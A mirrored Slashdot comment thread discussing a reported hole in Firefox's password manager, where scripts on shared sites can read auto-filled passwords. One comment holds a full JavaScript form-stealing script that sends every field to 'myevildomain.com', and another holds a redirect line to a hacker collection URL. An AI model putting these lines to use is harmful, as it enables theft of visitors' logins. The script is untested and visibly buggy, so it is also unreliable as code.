Slashdot Mirror
Holes Remain Open in Firefox Password Manager
juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"
... my luggage doesn't run JavaScript.
That's it, I'm leaving the Internet. Forever.
Only the brightest survive (e.g. we, who use NoScript).
I think people really need to have their head examined when it comes to certain features.
Don't want to remember all your passwords? Don't use sites that require passwords.
Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?
Having something "remember" your passwords defeats the purpose of having passwords.
He painted a unicorn in outer space. I'm askin' ya, what's it breathin'?
Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.
\u262D = \u5350
So before you jump to that conclusion, have you tested this against other browsers?
Not being a developer myself,I don't know have an idea about how to fix it, but this seems like an awful sticky technical problem.
I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.
Your sig(k) has been stolen. There is a puff of smoke!
Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript!, an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.
The thing that scared me away from the password manager in Firefox was a program called System Info for Windows. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.
It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.
Firefox having a vulnerability in the password manager does not make IE6 and IE7 'more secure' browsers. If it did, then this site (http://www.sans.org/top20/) would not be worth reading....
Have a look at soylentnews.org for a different view
IE is not affected because it doesn't automatically enter the info into the forms on load.
Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."
Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.
I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.
Use something like PasswordSafe (http://passwordsafe.sourceforge.net/) to store your passwords.
Use KeePass http://keepass.info/. Open source, and better automation with websites and much more control than the internal password manager.
Sounds like the exploit relies on auto-enter password fields for a domain, and then using javascript to transmit the value of thte password field to the attacker's machine. So, not so much a coding error as a flaw in the thinking that any password field on a site should be auto-filled in. Requiring some action on the part of the user would help with this, but a better solution would be to move to openID.
You drank my drink, you drunk!
Can someone confirm if Safari is actually vulnerable, or if it is just that the author thinks that "all open source browsers are just the same"?
I tried it with Konqueror and default KDE 3.5 password saving tecnhology, and no password leaked this way. I wonder if Safari would have problems there.
-><- no
I wonder why they didn't mention the "Master Password" feature of the password manager. Every time the password manager activates, it prompts you to type in a single master password. This should be effective in preventing any password harvesting, save for any other bugs that the manager might have.
It's things like this that force me to disable Password Manager altogether. If only one security hole exists in Password Manager, someone would be able to grab passwords to my bank account, credit card, e-mail, and more. It's a lot harder for the hackers to get the passwords when the only place they are stored is in my head.
With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements. I wish there would be an official standard for secure passwords so that I could reliably use one password for most of my accounts. Of course, that would also be a security risk because if someone got that password, they would have access to most of my accounts, but that's a separate issue.
It's already been done, and the result is open source: KeePass. Unlike other password managers, KeePass stores passwords in a cryptographically-safe database. Passwords are never entered automatically -- you can double click the KeePass password field to copy the password to the clipboard for 10 seconds, and then paste it into Web page's password field. After 10 seconds, the password is automatically removed from the clipboard. Works for more than web pages, too.
My blog
Password Safe is good for me.
I don't know how easily crackable it is, but at least it's not linked directly to the Internet like a browser.
By using this extension, the security whole is fixed. Just have to wait around for FF to implement it natively.
2 9
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).
https://addons.mozilla.org/en-US/firefox/addon/44
Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.
From the MSDN website I can quote:
So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.
document.location="http://some.hackers.url/collecThen redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)
Just stating the obvious, although now I'm actually curious if this works on IE...
It's not even really a browser security issue. Okay, I suppose there could be user-interaction requirements so the form-filler doesn't *automatically* autofill on page load, but the real issue is site-owners who ignore the basic principles of site security and password handling, and open their users up to simple exploits.
The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption-- a line has to be drawn somewhere as to what "one entity" is, and to split it much further would lead to unnecessary hoops and inconveniences. Back in the NetSol-monopoly days before cheap domain names, this point may have been debatable, but at that time there was far less personal information getting passed around by clients, as well.
Nowadays, anyone who is running a service with open access and open-ended "userpages" should be taking the bare-minimum step of sub-domaining their users' pages, and sub-domaining their own login forms as well. It costs nothing, it's more convenient for users, and it sandboxes everyone from each others' potential hack-attacks. If an exploit that gets around that, then people can talk, as that'd be a legitimate XSS or trojan/spoofing exploit. This stuff, though, is pinning exploits borne of shoddy web-side security onto the client developers.
Information wants to be free.
Entertainment wants to be paid.
You just want to be cheap.
You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.
Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.
The "right" solution is to have a challenge/response protocol where your secret key is never sent out of your computer at all. The current password situation is a huge mess since you need a different password for every site or risk one compromised trusted site giving away your password to everything. Most users, even when using a password manager, aren't going to have unique passwords for every site, let alone strong ones. It wouldn't surprise me at all if such a protocol already exists in the HTML standard. It certainly should.
The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.
This exploit exists for the simple reason that the program which has access to the stored passwords is also the same program that's rendering html and processing javascript and interpreting css and everything else.
Simply store your passwords in a separate program. E.g., Password Gorilla (http://fpx.de/fp/Software/Gorilla/). Then it is a simple matter to use the clipboard to copy the user id's/passwords over to the browser login forms (Password Gorilla makes this a simple right-click operation).
Then disable the browser integrated password manager. If the browser stores no passwords, it can not leak passwords.
Another advantage is that Password Gorilla also includes a strong password generator, so you can generate very good passwords (and use different ones for different sites) and thereby increase your security.
It also runs on both Win and Linux, from the same data files.
It also includes a "merge" functionality so you can keep changes synced between different files (desktop/laptop, etc.).
While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.
In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and customer service that they've reduced the value of their business to me by not accepting secure passwords and that I will no longer deal with them except by a cash-n-carry basis. A few of them have responded positively and after some effort have increased their password security by allowing special characters and thus they've gained an increased level of business from me along with the positive word of mouth advertising to my friends and associates.
Mod me up/Mod me down: I wont frown as I've no crown
Uh, how does the existence of a specific exploit in Firefox make it a less secure browser than IE?
History disagrees with you.
If you can provide some hard evidence that IE is more secure than Firefox, we would all be interested in seeing it.
But we won't be holding our breath, either, for two reasons: one, there is no such evidence; two, you would probably not be capable of providing it even if it existed.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
Who found the bug? Can we commision a hit on him?
Ok, I take that back. Forgot this is Firefox, not Safari.
But I can't seem to get the Browser Check to pull passwords on Safari 2.0 or Mac/Win Firefox with all three using password manager. Is there a specific way that the password manager/auto-fill needs to be set up in order to pull the data?
IE, is this more FUD-ey stuff that is very situational than practical?
The vulnerability only stems from the fact that Firefox puts the passwords into the box.
There is no workaround for this.
So, if you're that worried about your passwords being stolen, don't use the password manager. If you're worried about burgulars, close your window and add some bars. Better yet, get rid fo the window all together.
But this means, that a second, evil page on the same server could steal those saved passwords.
In this case the server has already been compromised to some degree... and the only password in jeopardy is one to the very server you are connected to....
That's like saying a local restaurant is not a safe place to use a credit card.... because the staff might see my credit card number or they might be robbed and have my signature slip stolen...
BTW: Have any IE users actually tested to see that IE doesn't have the same "vulnerability"?
From the Kwallet handbook (a KDE utility; GNOME has equiv.): The wallet subsytem provides a convenient and secure way to manage all your passwords. I'm not sure if this can be done automatically (integrated in browser) but manually, using a master key/password, it is a good way to store passwords for those with Alzheimer or other memory trouble. One could even use GPG/PGP or TrueCrypt (or LUKS/GELI etcetera) as 'wallet'. As long as you can remember/have the master key its more secure and reliable than (sticky) papers, or a plethora of passwords to remember, or using the same password for various purposes. Just make sure you have this data backed up.
WE DON'T NEED NO BLOG CONTROL.
does anyone have a list of sites which are likely to let third parties insert js code?
would myspace, popular for being visually "hackable", or facebook be affected?
facebook in particular lets you add 3rd party extensions to your profile. would
those extensions be able to add appropriate js code to extract your facebook
password from your firefox password manager?
What does Window Snyder have to say now? How many times have we shown you the exploits (and demonstrated fully) and got shot down for it? Well, now that the real exploits are gaining attention (thanks to some clever tactics), we'll see her reaction later. Her constant smartass remarks, and devs hiding certain bug exploits and fixes from the ones that found them in order to save face is just making Mozilla look worse and worse. When you have to rely on third party software to keep Firefox safe now, well, it's starting to sound more like IE now, huh? Please, lets save Mozilla by ridiculing the people in it causing the problems and not allowing change to happen instead of piling bloat over bloat (It's pretty bad when you have such horrible memory leaks in Firefox now).
I am not a Microsoft shill, I support fixing Firefox but the masters don't care.
Ok, I just RTFA (odd for an Anonymous Coward, I know) but the issue here is not with Password Manager at all. It has to do with community portals allowing people to spoof login pages. It's basic phishing 1.0. Yes, a script could be "injected" to secretly read and report back the issues. But this isn't new to Firefox. The problem is "community sites" that let *ANY MORON CREATE CONTENT* without putting proper safeguards in to stop this kind of abuse. It's not the browser's problem that site admins are too stupid to stop this crap. Any site stupid enough to let me inject scripts into a page gets what they deserve. Hell, I could write a script that works with any JavaScript enabled browser back to Netscape 3.0 to do this. Hell, I can grab any form information if I really want.
//written on the fly with no testing.
//because vbscript is the most evil server-side language ever. //grab every form element //and add the name value pair to a querystring. //fire away //and return the default onsubmit result (if any)
//dummy function.
//hold onto any previously set onload method //use dummy function instead //set my own document onload script to set up my form stealing. //find any forms on the page. //hold on to any form's previously set onsubmit method //or use the dummy function //set my own onsubmit method. //fire the previously set onload function (if any);
In fact, here you go:
function stealFormInfo() {
var stolenInfo = 'http://wwww.myevildomain.com/myevilscript.asp';
a = 0;
for (elementname in this.elements) {
stolenInfo += (a)?('&'):('?');
stolenInfo += elementname + '=' + urlencode(this.elements[elementname].value);
a++;
}
var sendMe = new Image();
sendMe.src = stolenInfo;
return this.oldonsubmit();
}
function doNonthing() {
return true;
}
if (document.onload) {
document.oldonload = document.onload;
}
else {
document.oldonload = doNothing;
}
document.onload = function setTrap() {
for (formname in document.forms) {
if (document.forms[formname].onsubmit) {
document.forms[formname].oldonsubmit = document.forms[formname].onsubmit;
}
else {
document.forms[formname].onsubmit = doNothing;
}
document.forms[formname].onsubmit = stealFormInfo;
}
document.oldonload();
}
Why not place security restrictions on embedded Javascript? Any website developer worth his or her salt already puts all Javascript in external files. Don't allow embedded Javascript to read password fields or cookies and you make an attacker's job much more difficult. Or so it would seem to me, anyway.
I'd like to plug Password Maker. It's under the LGPL license. It creates a per-site password using the site's domain name and a passphrase of your choosing as seeds. All the advantages of a password manager, strong passwords, and different passwords for different accounts without actually having to store anything on disk or remembering more than one passphrase. Since by default there's no password stored on disk (and the extension will specifically warn against doing this if you change that setting), there's nothing for password-stealing javascript exploits to get.
Because of the hash that's used, it doesn't work on sites that require alphanumeric passwords, but any site with that idiotic requirement has serious security issues anyway.
How about the fact that IE still doesn't even have a passwd manager or any protection for your passwords at all.
I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionnally want to log from another computer, for some urgent matter, you cannot find what your password was!
On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).
Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.
McCartney fans pay bus tickets. [...] Lennon fans too, with discretion.
Defending stupidity only makes you look stupid.
If someone can't remember a password, should they really be using a computer? How on earth can anyone function with such a defective brain that they are unable to remember a string of 4-8 characters?
Do they have to tattoo the names of their wife and kids onto them, like in "Memento"?
Who on Earth uses the password save feature and expects it to be safe anyway... I mean, come on. I keep my password manager on my USB stick, using a program that doesn't communicate with the network. I don't keep them in the program that will also talk to the site I want to log into. Too much danger that info will leak or a way in will be found... well, whaddayaknow.
Maybe a much better solution. But you need to install Linux or *BSD first.
Maybe Computers will never be as intelligent as Humans.
For sure they won't ever become so stupid. [VR-1988]
I have a hackproof system for password management. It's called a "brain." I remember my passwords, then I retrieve them from memory when I need them.
Fanboy here. You're right. Got that outta the way
The problem is not really with the firefox password manager, because
1. Even if you only automatically entered a password with a push mechanism (right-click to fill in password information) then people would still do that on the "bad" scripts. The problem, like most things, is a problem of social hacking. Education is what is needed... maybe make firefox educational as it's logging into various login pages?
2. Remember the problem boils down to using your fileserver password for your myspace account: that's what this is talking about. It's not like an attacker can read your whole password manager, it can only get the password for a certain site that they have ALREADY compromised (myspace and facebook are sites that are compromised by design). If you use one password for all those inherently insecure sites, and another one for your email, and another one for your banking then this attack, even if successful, will not hurt you as much as you think it would Oh no! Some script kiddy finally managed to get my facebook password! He might upload pictures... and people would think I have a life.
somewhere, on a Big Red Sign:
if(color==blue){speed--;}
Surf the Internet without NoScript enabled? Aren't you asking to get infected if you do that? I mean, that is like using IE -- walking around in the ghetto with a sign on your head saying "carrying lots of money, I can be easily robbed"...
That is like having Admin privilege while surfing the Internet... Just asking to get infected..
instead...
The problem with IE, was, for the longest time, that it did not provide standard protections. It always allowed the remote sever to control the users machines, and that control, though useful, lead to malicious use. The main thing that other browsers did, and plugins for IE, was allows user to limit the control that the remote site could exert on the local machine, thus increasing security. The user can now control everything, even the look and feel, which is problem for sites that require control of the user to generate revenue, but good for the user. For most users, the two major thing the user can't control or still need, the flash plugin and java script, are now arguably the major points of attack.
So what is the security issue in this case. It is that passwords are stored by the browser, inside the sand box, so to speak. This is bad. Passwords should be stored securely at the system level, available for applications to request, and with the user permission supplied. In other words, application password managers have to go.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
This is not a real bug of the Firefox Password Manager, as this security hole even exists if the manager worked exactly as it was intended by the developers.
A possible solutions would be to block javascript access on the value of any field that has automatically been filled by the password manager. Or, as this may cause the login procedure of some sites to fail, show a security prompt in case a script wants to access these fields.
"an attacker may emulate the login form "
This is the same old whore in new shoes. A javascript text entry masquerading as something else. You may as well point in apache's direction for htaccess too then.
As long as people do not think about what they are doing with their web browser, you will always have this problem. If people would think about web sites the same way they think about crossing a busy street the problem would be solved.
boycott slashdot February 10th - 17th check out: altSlashdot.org
You could have gone for insightful instead of trolling by writing something along the lines of "Generally, Opera has a much better safety record (the one we know of, anyway), and I prefer the UI."
I really like Opera, I even have it on my 3 phones and my PDA. Plus my 2 laptops, 4 stationaries, and I'm currently reading a book inspired by Opera. (Sorry, bad pun)
Trolling, however, will only get those who see your post to have a negative association to Opera, just like many have a negative association to Gentoo...
No-one loves a M$ troll. You idiots sure are busy lately...
Caveat Utilitor
Okay so I think it should be made clear in the summary, that the article states, you can only lose the password of the same domain. So if the malicious page is on MySpace, then it would only steal your MySpace password. Yes it's still a password, but most people probably don't use thier MySpace password as their credit card password, but even then they would need to phish which credit card you have and what your username is there. Not a big deal in my opinion but I'm glad that it was brought to light that this can happen.
Causing Chaos Everywhere,
Nik J.
The strange world of a loner, in a populous city, drowning in society
I know what you mean.
Once I mastered NOTEPAD I dumped MS Office.
In this case the server has already been compromised to some degree... and the only password in jeopardy is one to the very server you are connected to....
Um, or the site doesn't do proper sandboxing of user input.
For instance, if you get a LiveJournal paid account, you can create your own page templates. Does it let you include javascript? I don't know. It's at least not unreasonable that they would, and I bet some people would expect it. But now they have opened their users to this vulnerability, despite the LJ server not being compromised.
Also, I'm reasonably certain enabling an automatic password fill on Opera would produce the same behavior. It's not as if Opera uses a different DOM for web-forms, or else we'll hear unending whining about how Opera doesn't work on standard Ajax sites. This isn't a code flaw in any one browser, it is a flaw in the philosophy that you can trust any Javascript code on a web page with any and all content on the same page; it's simply not accurate, because of things like Ajax xmlHttpRequest calls which allow any data on a page to be sent somewhere without even having to trick a user into some form of interaction.
But it's the same philosophy everything is based on, because it's how advanced Javascript and Ajax and so on actually work. Any browser that supports automatically filling a login form when you hit a page will be vulnerable to this. So it seems to me that what would make more sense is to put in a hotkey to 'auto-fill login forms' and only do so when the hotkey is pressed; the problem is that browsers blindly fill auto-login forms for a site without asking the user.
--Rachel
Using a different password for each site is the ultimate in security; however, without a password manager of some sort, it becomes too difficult to manage such a large list of passwords. Thankfully, OSS password managers such as Revelation and Figaro Password Manager exist! Personally, I use revelation; however, both are excellent pieces of software!
--Yahma
BlastProxy - Anonymous & Secure web browsing
ProxyStorm - Anonymous & Secure web browsing
LiarLiar - Open Source Voice Stress Analysis & Lie Detection Software
I don't trust any browser to save my login information. I use keepass. It's FOSS too.
http://keepass.info/
This is slashdot, remember? You're supposed to say "Get rid of WINDOWS all together!"
As pointed out, noscript is your friend. Another handy plugin is passwordmaker, https://addons.mozilla.org/fr/firefox/addon/469
Makes it trivial to have different, secure passwords for each site.
Don't store your passwords in ANY password manager, and especially do not allow Web site to "remember you." Enter your passwords every time you go to a site that needs them.
This means using passwords you can remember, rather than truly strong random passwords, which is a security problem in itself. But with some initial judicial selection of a manual password generation algorithm, this should be doable for most people. If you have a limited set of passwords you use frequently, especially for low value applications like Web sites, and they are generated by a manual algorithm that produces half decent strength passwords, you don't need a password manager.
Reserve your high strength passwords for your personal system, make sure they're different from anything you use externally to your system such as Web sites, and put them on an encrypted USB key or encrypted file on your system so they can't be obtained even by a hack.
Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
It's called "a notebook".
I keep one in my safe, and whenever i forget a password, i consult it. The advantage of having the information offline is that nobody can hack it, and if someone steals your laptop, they don't get your passwords.
Of course, it's not 100% safe, there's the possibility of someone stealing the notebook. But I'm prepared for that case. I don't put the passwords directly, but instead write some hints based on information that only I know. Like "My friend Toby's former street address", and such.
The first thing i found after the previous announce of this problem was the firefox extension that timesout the master password after let's say 30 seconds. :)
Next time the browser wants to fill in a blank it ask for the master password, if you don't trust the site just press escape and nothing will happen !
I don't have to worry about this exploit because for all my password-saving needs I use a fine piece of software called E-Wallet form the friendly guys at Gator, I mean, Claria.
"Emancipate yourself from mental slavery, none but ourselves can free our minds !"
This produces a message box revealing the contents of the password field when the form is submitted. It reveals passwords entered by the visitor as well as those automatically filled in by IE. The password box is not filled in until the user name has been entered. Tested in IE6SP2 and IE7.
AJAX? xmlHttpRequest?
Oh, please. It's much easier than that. These hacks have been possible using much more lo-tech techniques since scripting began.
Also FatPhil on SoylentNews, id 863
Some further testing reveals, however, that IE will not fill the password if the resource portion of the URL differs. This is a vulnerability in only Firefox because only Firefox uses the form action to choose the password, and only Firefox does so without user intervention.
Actually, Opera is a little bit better than other browsers I've used on the point of password security.
Screenshot for illustrative purposes; it gives you the option to associate the password with a unique URL instead of the entire domain. Quite handy sometimes, like for instance, if you have GMail plus a few Google Apps domains.
Subdomains won't stop other subdomains from reading the parent domain's cookies. If the parent domain is used to auth (e.g. some sesssionID), a malicious script could retrieve or send data to other subdomains. You'd have to be extra careful about isolating subdomains.
I'm also unsure on the exact specifics of the javascript security model for subdomains.. anyone know?
I have been using Mozilla browsers as long as they have existed. But I have never been really impressed by their safety, stability or security. At times, they may have been better than IE - but as I never have used IE, that comparison means very little to me. I am not interested in relative safety, stability or security, I want absolutes.
/dev/mem to recover my text. If not, well, then I'm not so lucky. A safe and stable system would ensure that anything related to the configuration of the browser or entered by the user, was flushed to disk ASAP. Recently, I tried to install the NoScript plugin - I was at the same time astonished and infuriated when I got an error message which I can't remember exactly, but said something like "installation failed, this error is very likely to be transient, so please try again". Please - heed the wise words of Yoda: "Do, or do not. There is no try." I found myself with a broken plugin installation, and in order to fix it, I had to do things I'd rather not think about. A safe browser would ensure that it would be possible to undo the partial plugin installation and revert to exactly how things were before, without resorting to editing XML files by hand.
Let me explain what it is that I want:
First, usefulness. Given that pages are designed by clueless morons who suck up to each and every feature or plugin that might be available (Java, Javascript, Flash, embedded objects of of all kinds, perhaps even ActiveX?) the browser needs to handle such pages gracefully. However, such plugins, which may sometimes be closed-source blobs, should be treated with utmost suspicion, and only be allowed to run in a jaillike sandbox, with all priviledges revoked, and isolated from all other parts of the executing session.
Second, stability. On my NetBSD system, I have a setup with mplayer-plugin, java-plugin, and seamonkey, all natively compiled. I admit that by using an obscure OS, my stability issues are partly self-inflicted, but sound defensive programming could avoid some of those problems. Why is it, that a page loading a plugin and crashing, takes down each and every window I have open? Because everything runs without isolation, that's why. If each session ran in its own OS-process, with just a shared display process, this could not happen. But that's not the worst part. Often, I find myself typing lengthy text into a textarea (like just now), and although I have Mozex installed, I still haven't gotten used to it. (There you go.) Although vi may be considered an archaic editor, it does a thing or two right. First, it is far less prone to going belly-up. Second, when it does, I have a fair chance of recovering the text I was typing. Not so with Mozilla. If I am really lucky, the Mozilla process hangs instead of exiting, and then I can use strings on
Third, security. Why is this always an afterthought? I would like to know, record (with timestamp), and archive any exchange of information for later investigation. The only way I would be able to do so would be by making a proxy and go through that always. Why not a function of the browser? I would like to control preemtively each and every IP-address my browser wants to connect to, unless it's on a white-list. Why can't I? The default browser configuration let's me block images from a given server, but why this coarse and arbitrary resolution? Why can't I block URLs by regex? I wan't the ability to restrict beforehand through ACLs, which sites and URLs I like to see. And it goes without saying, that no session should ever be able to send my private data to the server without my approval. I want this enforced, by a provably secure design, using OS security measures to make proper guarantees: the session should run as nobody, chrooted to an empty workdir, and all requests for config and private information should go through a client-server like connection, that should be filtered, logged and audited. And of course anything stored locally should optionally be stored encrypted. Nothing unapproved would ever go on
Good point. Session-stealing is a threat, since most times an umbrella session is required across subdomains to carry the "logged-in-ness". Hadn't considered that.
I suppose that if you isolated as many sensitive operations as possible under a specific subdomain's session-ID cookie, then use a less-secure and more general ID cookie for things like viewing others' profiles, that would dampen and contain, although not eliminate, this session-theft threat.
Information wants to be free.
Entertainment wants to be paid.
You just want to be cheap.